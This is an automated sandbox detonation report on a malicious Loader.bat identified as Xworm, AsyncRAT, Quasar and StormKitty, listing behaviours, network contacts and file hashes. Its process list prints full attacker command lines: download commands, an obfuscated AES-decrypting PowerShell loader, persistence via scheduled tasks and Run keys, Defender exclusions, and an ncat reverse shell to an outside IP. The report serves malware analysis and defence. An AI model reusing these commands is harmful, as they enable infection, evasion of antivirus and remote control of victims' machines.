Analysis Overview
SHA256
3945619c240ea627ece0b2e090f073d71c5a66a046d64ce84cb6177fa52bd6ce
Threat Level: Known bad
The file Loader.bat was found to be: Known bad.
Malicious Activity Summary
Detect Xworm Payload
Xworm
AsyncRat
StormKitty
Quasar RAT
StormKitty payload
Quasar payload
Async RAT payload
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Loads dropped DLL
Executes dropped EXE
Checks computer location settings
Drops startup file
Adds Run key to start application
Looks up external IP address via web service
Drops file in System32 directory
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Uses Task Scheduler COM API
Suspicious use of SetWindowsHookEx
Modifies registry class
Modifies data under HKEY_USERS
Suspicious use of WriteProcessMemory
Scheduled Task/Job: Scheduled Task
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-07-02 22:53
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-02 22:53
Reported
2024-07-02 22:55
Platform
win10v2004-20240508-en
Max time kernel
100s
Max time network
117s
Command Line
Signatures
AsyncRat
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
StormKitty
StormKitty payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zip.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\conhost.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\powershell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\powershell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\conhost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\wininit.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zip.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\WinRunner.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ncat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ncat.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ncat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ncat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ncat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ncat.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update = "C:\\Users\\Admin\\AppData\\Local\\Temp\\WinRunner.exe" | C:\Users\Admin\AppData\Local\Temp\WinRunner.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\powershell = "C:\\Users\\Admin\\AppData\\Roaming\\powershell.exe" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\Tasks\powershell | C:\Windows\system32\svchost.exe | N/A |
Enumerates physical storage devices
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\wininit.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zip.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Loader.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri https://github.com/ReaImastercoder69/-shgdsaukjjd/releases/download/dasdsa/Loader.bat -OutFile libuac.dll.bat"
C:\Windows\system32\curl.exe
curl -o libuca.dll.bat https://github.com/Realmastercoder69/-shgdsaukjjd/releases/download/dasdsa/Loader.bat
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8OtTMs/npLYOIBYlfG/OTBN6FeVwAUDUGxfjA+29aJM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Kpp156hrLYj8cw8zv2pEoA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $SJXNG=New-Object System.IO.MemoryStream(,$param_var); $sgoZX=New-Object System.IO.MemoryStream; $dynjl=New-Object System.IO.Compression.GZipStream($SJXNG, [IO.Compression.CompressionMode]::Decompress); $dynjl.CopyTo($sgoZX); $dynjl.Dispose(); $SJXNG.Dispose(); $sgoZX.Dispose(); $sgoZX.ToArray();}function execute_function($param_var,$param2_var){ $UGanP=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KjkSu=$UGanP.EntryPoint; $KjkSu.Invoke($null, $param2_var);}$tkMkx = 'C:\Users\Admin\AppData\Local\Temp\libuac.dll.bat';$host.UI.RawUI.WindowTitle = $tkMkx;$qEPqg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tkMkx).Split([Environment]::NewLine);foreach ($rIcAS in $qEPqg) { if ($rIcAS.StartsWith('ChJbrTJEBszqYyljGNnq')) { $eAywj=$rIcAS.Substring(20); break; }}$payloads_var=[string[]]$eAywj.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_545_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_545.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_545.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_545.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8OtTMs/npLYOIBYlfG/OTBN6FeVwAUDUGxfjA+29aJM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Kpp156hrLYj8cw8zv2pEoA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $SJXNG=New-Object System.IO.MemoryStream(,$param_var); $sgoZX=New-Object System.IO.MemoryStream; $dynjl=New-Object System.IO.Compression.GZipStream($SJXNG, [IO.Compression.CompressionMode]::Decompress); $dynjl.CopyTo($sgoZX); $dynjl.Dispose(); $SJXNG.Dispose(); $sgoZX.Dispose(); $sgoZX.ToArray();}function execute_function($param_var,$param2_var){ $UGanP=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KjkSu=$UGanP.EntryPoint; $KjkSu.Invoke($null, $param2_var);}$tkMkx = 'C:\Users\Admin\AppData\Roaming\Windows_Log_545.bat';$host.UI.RawUI.WindowTitle = $tkMkx;$qEPqg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tkMkx).Split([Environment]::NewLine);foreach ($rIcAS in $qEPqg) { if ($rIcAS.StartsWith('ChJbrTJEBszqYyljGNnq')) { $eAywj=$rIcAS.Substring(20); break; }}$payloads_var=[string[]]$eAywj.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Users\Admin\AppData\Local\Temp\conhost.exe
"C:\Users\Admin\AppData\Local\Temp\conhost.exe"
C:\Users\Admin\AppData\Local\Temp\wininit.exe
"C:\Users\Admin\AppData\Local\Temp\wininit.exe"
C:\Users\Admin\AppData\Local\Temp\7zip.exe
"C:\Users\Admin\AppData\Local\Temp\7zip.exe"
C:\Users\Admin\AppData\Local\Temp\WinRunner.exe
"C:\Users\Admin\AppData\Local\Temp\WinRunner.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\$TMP~.bat"
C:\Users\Admin\AppData\Local\Temp\ncat.exe
C:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell
C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "Windows Start-Up Application" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\wininit.exe" /rl HIGHEST /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zip.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '7zip.exe'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\hxmtgb.bat"' & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\hxmtgb.bat"'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hxmtgb.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IjJvKUiZ3qVbekS9RBld+s/2H9KCxAMxfp72UAdOekw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RSqfgbsxY4tQviMhgruGlA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $mTJVo=New-Object System.IO.MemoryStream(,$param_var); $OVEZJ=New-Object System.IO.MemoryStream; $xpowC=New-Object System.IO.Compression.GZipStream($mTJVo, [IO.Compression.CompressionMode]::Decompress); $xpowC.CopyTo($OVEZJ); $xpowC.Dispose(); $mTJVo.Dispose(); $OVEZJ.Dispose(); $OVEZJ.ToArray();}function execute_function($param_var,$param2_var){ $aXdmE=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $plyTG=$aXdmE.EntryPoint; $plyTG.Invoke($null, $param2_var);}$DUACE = 'C:\Users\Admin\AppData\Local\Temp\hxmtgb.bat';$host.UI.RawUI.WindowTitle = $DUACE;$NSEOn=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($DUACE).Split([Environment]::NewLine);foreach ($fxoWu in $NSEOn) { if ($fxoWu.StartsWith('WopmnYnvzYwvYHEKXXam')) { $rQXdu=$fxoWu.Substring(20); break; }}$payloads_var=[string[]]$rQXdu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\powershell.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "powershell" /tr "C:\Users\Admin\AppData\Roaming\powershell.exe"
C:\Users\Admin\AppData\Local\Temp\ncat.exe
C:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.149.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.38.18.104.in-addr.arpa | udp |
| US | 147.185.221.20:45895 | tcp | |
| US | 8.8.8.8:53 | 20.221.185.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | finally-grande.gl.at.ply.gg | udp |
| US | 147.185.221.20:25844 | finally-grande.gl.at.ply.gg | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | stop-largely.gl.at.ply.gg | udp |
| US | 147.185.221.20:27116 | stop-largely.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | super-nearest.gl.at.ply.gg | udp |
| US | 147.185.221.20:17835 | super-nearest.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| FR | 162.19.58.156:443 | i.ibb.co | tcp |
| US | 8.8.8.8:53 | 156.58.19.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | best-bird.gl.at.ply.gg | udp |
| US | 147.185.221.20:27196 | best-bird.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | wiznon.000webhostapp.com | udp |
| US | 145.14.145.80:443 | wiznon.000webhostapp.com | tcp |
| US | 8.8.8.8:53 | 80.145.14.145.in-addr.arpa | udp |
| US | 147.185.221.20:17835 | best-bird.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | wiz.bounceme.net | udp |
| US | 65.191.34.109:6000 | wiz.bounceme.net | tcp |
| US | 65.191.34.109:6000 | wiz.bounceme.net | tcp |
| US | 147.185.221.20:25844 | best-bird.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 147.185.221.20:45895 | best-bird.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | unique-emotions.gl.at.ply.gg | udp |
| US | 147.185.221.20:54742 | unique-emotions.gl.at.ply.gg | tcp |
| FR | 162.19.58.156:443 | i.ibb.co | tcp |
Files
memory/4512-0-0x00007FFB52013000-0x00007FFB52015000-memory.dmp
memory/4512-1-0x0000028443040000-0x0000028443062000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_on1zkr3r.wy2.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4512-11-0x00007FFB52010000-0x00007FFB52AD1000-memory.dmp
memory/4512-12-0x00007FFB52010000-0x00007FFB52AD1000-memory.dmp
memory/4512-16-0x00007FFB52010000-0x00007FFB52AD1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\libuac.dll.bat
| MD5 | 01132c50b0d844fab3b44bdb50be7445 |
| SHA1 | c1212c8576c7794a2bbcf86f6a5bbd212fa23994 |
| SHA256 | 874cd778f30a84b531ed0811536dd64fdf3259db9509116f3eb3414127a4e0bf |
| SHA512 | 96be33e08ca7a4b7331f96488182d999d94a57923d70d6af0acda64795e3c4fc5cab55b16661af48832b63ea38bf39a40dfe636f479709e0d4afb723ac3d9c31 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 2f57fde6b33e89a63cf0dfdd6e60a351 |
| SHA1 | 445bf1b07223a04f8a159581a3d37d630273010f |
| SHA256 | 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55 |
| SHA512 | 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220 |
